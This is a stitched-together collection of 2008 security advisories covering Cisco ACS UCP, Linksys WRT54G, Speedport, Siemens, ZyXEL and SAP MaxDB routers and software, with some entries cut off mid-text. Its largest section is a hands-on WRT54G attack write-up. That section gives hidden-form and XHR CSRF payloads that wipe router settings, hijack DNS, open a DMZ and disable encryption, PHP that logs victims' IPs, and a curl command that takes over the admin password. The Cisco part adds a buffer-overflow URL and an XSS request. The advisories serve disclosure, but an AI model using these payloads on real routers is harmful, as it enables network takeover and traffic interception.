; char * .text:00401071 call sub_402870 ... .text:00402870 sub esp, 60h .text:00402873 mov ecx, 17h .text:00402878 xor eax, eax .text:0040287A push edi .text:0040287B lea edi, [esp+64h+var_60] .text:0040287F rep stosd .text:00402881 mov ecx, [esp+64h+arg_0] .text:00402885 stosw .text:00402887 stosb .text:00402888 lea eax, [esp+64h+var_60] .text:0040288C push eax ; int .text:0040288D push ecx ; char * .text:0040288E call sub_402940 ... .text:00402940 mov ecx, [esp+arg_0] .text:00402944 xor eax, eax .text:00402946 test ecx, ecx .text:00402948 jz locret_402A11 .text:0040294E push ebx .text:0040294F push esi .text:00402950 push edi .text:00402951 push offset a_ ; "." .text:00402956 push ecx ; char * .text:00402957 call _strtok .text:0040295C mov edi, eax .text:0040295E or ecx, 0FFFFFFFFh .text:00402961 xor eax, eax .text:00402963 mov ebx, [esp+14h+arg_4] .text:00402967 repne scasb .text:00402969 not ecx .text:0040296B sub edi, ecx .text:0040296D lea edx, [ebx+1] .text:00402970 mov eax, ecx .text:00402972 mov esi, edi .text:00402974 mov edi, edx .text:00402976 push offset a_ ; "." .text:0040297B shr ecx, 2 .text:0040297E rep movsd .text:00402980 mov ecx, eax .text:00402982 push 0 ; char * .text:00402984 and ecx, 3 .text:00402987 rep movsb Example: The following request will cause EIP to be overwritten with 0x42424242. The line may wrap, depending on how you view this file. https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker. A non-persistent Cross Site Scripting vulnerability can also be triggered using the Help facility of the CGI. An example request would be as follows. The line may wrap, depending on how you view this file. https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E Solution: Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed software: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml ________________________________________________________________________ Credit: The vulnerabilities were identified by Felix 'FX' Lindner, Recurity Labs GmbH, during a cursory inspection of a customer installation of the ACS UCP product. Greets to the teams at Recurity Labs and Zynamics, Sergio Alvarez, Max Moser, Alexander Kornbrust, Maxim Salomon, Nicolas Fischbach, Karsten Schumann, Frank Becker, PSIRT, Paul Oxman, John Stewart ________________________________________________________________________ The information provided is released "as is" without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages. The contents of this advisory are copyright (c) 2008 Recurity Labs GmbH and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. ________________________________________________________________________

The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Linksys WRT54G Security Bypass Vulnerability SECUNIA ADVISORY ID: SA29344 VERIFY ADVISORY: http://secunia.com/advisories/29344/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From local network OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/ DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri. WRT54G v5/v6: Install version 1.02.5. WRT54G v8: Install version 8.00.5. WRT54G v8.2: Install version 8.2.05. PROVIDED AND/OR DISCOVERED BY: meathive ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | | Y | | | | || || | | | | | || / | __ | | | | || _] | | | . ++| Intro ---------------------- This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered _remotely_ via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits. ++| Let's Get Dirty ---------------------- You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes. The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required in order to submit our form that will be constructed using GET parameters observed from the device's Web interface. document.f.submit(); This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz". <form name="f" action="http://192.168.1.1/WBasic.tri" method="POST"> <input type="hidden" name="submit_type" value=""> <input type="hidden" name="channelno" value="11"> <input type="hidden" name="OldWirelessMode" value="3"> <input type="hidden" name="Mode" value="3"> <input type="hidden" name="SSID" value="kinqpinz"> <input type="hidden" name="channel" value="6"> <input type="hidden" name="Freq" value="6"> <input type="hidden" name="wl_closed" value="1"> <input type="hidden" name="sesMode" value="1"> <input type="hidden" name="layout" value="en"> </form> The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request on behalf of the device, whereas we're interested in POST requests that actually trigger configuration changes. A GET request does nothing. Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP. ++| Remote Real World Attack Scenario ---------------------- So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so that you do not fall victim to a malicious individual hosting code that will be presented in this text. ++| Remote Real World Attack Scenario Requirements ---------------------- On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and, (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device. http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writes this information to a log file. <?php $ip=$_SERVER['REMOTE_ADDR']; $toWrite="Potential mark resides at $ip\n\n"; $f=fopen("mark.txt", "a+"); fwrite($f, $toWrite); fclose($f); ?> The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form. <script type="text/javascript"> document.f.submit(); </script> All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute. <form name="f" action="http://192.168.1.1/WBasic.tri" method="POST"> <input type="hidden" name="submit_type" value=""> <input type="hidden" name="channelno" value="11"> <input type="hidden" name="OldWirelessMode" value="3"> <input type="hidden" name="Mode" value="3"> <input type="hidden" name="SSID" value="kinqpinz"> <input type="hidden" name="channel" value="6"> <input type="hidden" name="Freq" value="6"> <input type="hidden" name="wl_closed" value="1"> <input type="hidden" name="sesMode" value="1"> <input type="hidden" name="layout" value="en"> </form> What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this: submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters and do not forget that the request must be POST, not GET. Also different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following. Potential mark resides at 1.1.1.1 Potential mark resides at 2.2.2.2 Potential mark resides at 3.3.3.3 So forth... They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on. When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, does not inform the user if they were educated enough of what has just happened, so they may continue on doing whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at our leisure and further test the remote host whether or not they are vulnerable to attack. At the very least, we may decide to completely reset the router to rest assured we know its current state to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible, here's how. <form method="post" action="http://192.168.1.1/factdefa.tri"> <input type="hidden" name="FactoryDefaults" value="Yes"> <input type="hidden" name="layout" value="en"> <input type="submit"> </form> This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line. <form method="post" action="http://192.168.1.1/Basic.tri"> <input type="hidden" name="dhcp_end" value="149"> <input type="hidden" name="oldMtu" value="1500"> <input type="hidden" name="oldLanSubnet" value="0"> <input type="hidden" name="OldWanMode" value="0"> <input type="hidden" name="SDHCP1" value="192"> <input type="hidden" name="SDHCP2" value="168"> <input type="hidden" name="SDHCP3" value="1"> <input type="hidden" name="SDHCP4" value="100"> <input type="hidden" name="EDHCP1" value="192"> <input type="hidden" name="EDHCP2" value="168"> <input type="hidden" name="EDHCP3" value="1"> <input type="hidden" name="EDHCP4" value="150"> <input type="hidden" name="pd" value=""> <input type="hidden" name="now_proto" value="dhcp"> <input type="hidden" name="old_domain" value=""> <input type="hidden" name="chg_lanip" value="192.168.1.1"> <input type="hidden" name="_daylight_time" value="1"> <input type="hidden" name="wan_proto" value="0"> <input type="hidden" name="router_name" value="WRT54G"> <input type="hidden" name="wan_hostname" value=""> <input type="hidden" name="wan_domain" value=""> <input type="hidden" name="mtu_enable" value="0"> <input type="hidden" name="lan_ipaddr_0" value="192"> <input type="hidden" name="lan_ipaddr_1" value="168"> <input type="hidden" name="lan_ipaddr_2" value="1"> <input type="hidden" name="lan_ipaddr_3" value="1"> <input type="hidden" name="lan_netmask" value="0"> <input type="hidden" name="lan_proto" value="Enable"> <input type="hidden" name="dhcp_start" value="100"> <input type="hidden" name="dhcp_num" value="50"> <input type="hidden" name="dhcp_lease" value="0"> <input type="hidden" name="dns0_0" value="1"> <input type="hidden" name="dns0_1" value="2"> <input type="hidden" name="dns0_2" value="3"> <input type="hidden" name="dns0_3" value="4"> <input type="hidden" name="dns1_0" value="5"> <input type="hidden" name="dns1_1" value="6"> <input type="hidden" name="dns1_2" value="7"> <input type="hidden" name="dns1_3" value="8"> <input type="hidden" name="dns2_0" value="9"> <input type="hidden" name="dns2_1" value="8"> <input type="hidden" name="dns2_2" value="7"> <input type="hidden" name="dns2_3" value="6"> <input type="hidden" name="wins_0" value="0"> <input type="hidden" name="wins_1" value="0"> <input type="hidden" name="wins_2" value="0"> <input type="hidden" name="wins_3" value="0"> <input type="hidden" name="time_zone" value="%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29"> <input type="hidden" name="daylight_time" value="ON"> <input type="hidden" name="layout" value="en"> <input type="submit"> </form> This is indeed convoluted but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri. http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en ++| An Alternative (with JavaScript) ---------------------- This is the basic exploitation method of the router although the attacker has many alternatives of submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: <a href="/path/" onClick="xhrRequest();">This looks innocent enough.</a> ...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.: var xhr=false; if(window.XMLHttpRequest) { xhr=new XMLHttpRequest(); } else if(window.ActiveXObject) { xhr=new ActiveXObject("Microsoft.XMLHTTP"); } function xhrRequest() { if(xhr) { xhr.open("POST", "http://192.168.1.1/Security.tri", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange=function() { if(xhr.readyState == 4 && xhr.status == 200) { var success=xhr.responseText; } } xhr.send("SecurityMode=0&layout=en"); } } The example above effectively disables all wireless encryption so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for everybody in the neighborhood! Here's the URL for disabling wireless encryption: http://192.168.1.1/Security.tri?SecurityMode=0&layout=en ++| An Alternative (without JavaScript) ---------------------- You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again: http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: <form method="post" action="http://192.168.1.1/dmz.tri"> <input type="hidden" name="action" value="Apply"> <input type="hidden" name="dmz_enable" value="1"> <input type="hidden" name="dmz_ipaddr" value="100"> <input type="hidden" name="layout" value="en"> ...and add these values to their user registration page with standard username/password/e-mail fields... Username: <input type="text" name="username"><br> Password: <input type="password" name="password1"><br> Confirm Password: <input type="password" name="password2"><br> <input type="submit"> </form> ...that can be found on traditional forums these days. The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.: curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://<REMOTE_EXTERNAL_ADDR>/manage.tri Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. ++| Conclusion ---------------------- It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects. Thanks go to hw2B for suggesting I write all of this garbage out. ++| URLs ---------------------- https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)

b_banner.stm (aka the login page) on the Deutsche Telekom Speedport W500 DSL router allows remote attackers to obtain the logon password by reading the pwd field in the HTML source. Speedport W500 is prone to an information-disclosure vulnerability. Exploiting this issue may allow an unauthenticated remote attacker to retrieve sensitive information that may lead to further attacks. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Speedport W500 b_banner.stm Password Disclosure SECUNIA ADVISORY ID: SA29414 VERIFY ADVISORY: http://secunia.com/advisories/29414/ CRITICAL: Moderately critical IMPACT: Security Bypass WHERE: >From local network OPERATING SYSTEM: T-Com Speedport W500 http://secunia.com/product/18002/ DESCRIPTION: A vulnerability has been reported in the Speedport W500 router, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to the login page (b_banner.stm) containing the password in plain text, which can be exploited to disclose the password and bypass the login mechanism. SOLUTION: Restrict access to the login page. PROVIDED AND/OR DISCOVERED BY: mutax ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to a information disclosure vulnerability

The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. Linksys WRT54G Router is prone to a remote security vulnerability

The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability

The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability

The Siemens SpeedStream 6520 router allows remote attackers to cause a denial of service (web interface crash) via an HTTP request to basehelp_English.htm with a large integer in the Content-Length field. Siemens SpeedStream 6520 is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted HTTP requests. The basehelp_English.htm has a large integer in the content-length section. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Siemens SpeedStream 6520 HTTP Request Processing Denial of Service SECUNIA ADVISORY ID: SA29325 VERIFY ADVISORY: http://secunia.com/advisories/29325/ CRITICAL: Less critical IMPACT: DoS WHERE: >From local network OPERATING SYSTEM: Siemens SpeedStream 6520 http://secunia.com/product/18085/ DESCRIPTION: laurent has reported a vulnerability in Siemens SpeedStream 6520, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when processing HTTP requests containing an overly large "Content-Length" header. This can be exploited to cause the web service to crash via e.g. a specially crafted HTTP POST request. SOLUTION: Restrict network access to the web service. PROVIDED AND/OR DISCOVERED BY: laurent ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

ZyXEL ZyWALL 1050 has a hard-coded password for the Quagga and Zebra processes that is not changed when it is set by a user, which allows remote attackers to gain privileges. ZyXEL ZyWALL 1050 devices contain a default password for their Quagga and Zebra daemon processes. The device fails to change the default password when a legitimate user sets a new password. Attackers can use this default password to gain unauthorized access to the device. By gaining administrative access to Quagga or Zebra, an attacker can modify network routes on the device, possibly redirecting traffic or denying network service to legitimate users. The attacker may also be able to exploit latent vulnerabilities in the daemon itself. ZyWALL 1050 is vulnerable; other devices may also be affected. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: ZyXEL ZyWALL 1050 Undocumented Account Security Issue SECUNIA ADVISORY ID: SA29237 VERIFY ADVISORY: http://secunia.com/advisories/29237/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From local network OPERATING SYSTEM: ZyXEL ZyWALL Series http://secunia.com/product/147/ DESCRIPTION: Pranav Joshi has reported a security issue in ZyXEL ZyWALL 1050, which can be exploited by malicious people to bypass certain security restrictions. This can be exploited to gain access to the quagga daemon (TCP ports 2601, 2602, and 2604) and e.g. view and manipulate routing information. The security issue is reported in ZyXEL ZyWALL 1050. SOLUTION: Restrict network access to the affected services. PROVIDED AND/OR DISCOVERED BY: Pranav Joshi ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Integer signedness error in vserver in SAP MaxDB 7.6.0.37, and possibly other versions, allows remote attackers to execute arbitrary code via unknown vectors that trigger heap corruption. SAP MaxDB is prone to a heap-based memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Successfully exploiting this issue will compromise the affected application and possibly the underlying computer. This issue affects MaxDB 7.6.0.37 running on the Linux operating system. Other versions running on different platforms may also be affected. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: MaxDB Multiple Vulnerabilities SECUNIA ADVISORY ID: SA29312 VERIFY ADVISORY: http://secunia.com/advisories/29312/ CRITICAL: Highly critical IMPACT: Privilege escalation, System access WHERE: >From remote SOFTWARE: MaxDB 7.x http://secunia.com/product/4012/ DESCRIPTION: Some vulnerabilities have been reported in MaxDB, which can be exploited by malicious, local users to gain escalated privileges, and by malicious people to potentially compromise a vulnerable system. 2) An error exists within the "sdbstarter" program when handling environment variables. Successful exploitation requires that the attacker is a member of the "sdba" group. PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense. ORIGINAL ADVISORY: iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=670 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=669 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. iDefense Security Advisory 03.10.08 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 10, 2008 I. BACKGROUND SAP's MaxDB is a database software product. MaxDB was released as open source from version 7.5 up to version 7.6.00. Later versions are no longer open source but are available for download from the SAP SDN website (sdn.sap.com) as a community edition with free community support for public use beyond the scope of SAP applications. The "vserver" program is responsible for accepting and handling communication with remote database clients. For more information, visit the product's website at the following URL. https://www.sdn.sap.com/irj/sdn/maxdb II. After accepting a connection, the "vserver" process forks and reads parameters from the client into various structures. When doing so, it trusts values sent from the client to be valid. By sending a specially crafted request, an attacker can cause heap corruption. This leads to a potentially exploitable memory corruption condition. III. In order to exploit this vulnerability, an attacker must be able to establish a TCP session on port 7210 with the target host. Additionally, the attacker must know the name of an active database on the server. Since this service uses the fork() system call once a connection has been accepted, an attacker can repeatedly attempt to exploit this vulnerability. Some exploitation attempts may result in the database process ceasing to run, in which case further exploitation attempts will not be possible. IV. DETECTION iDefense has confirmed the existence of this vulnerability in SAP AG's MaxDB version 7.6.0.37 on Linux. V. WORKAROUND Employing firewalls to limit access to the affected service will mitigate exposure to this vulnerability. VI. VENDOR RESPONSE SAP AG has addressed this vulnerability by releasing a new version of MaxDB. For more information, consult SAP note 1140135. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0307 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/06/2007 Initial vendor notification 12/10/2007 Initial vendor response 03/10/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2008 iDefense, Inc. Permission is granted for the redistribution of this alert 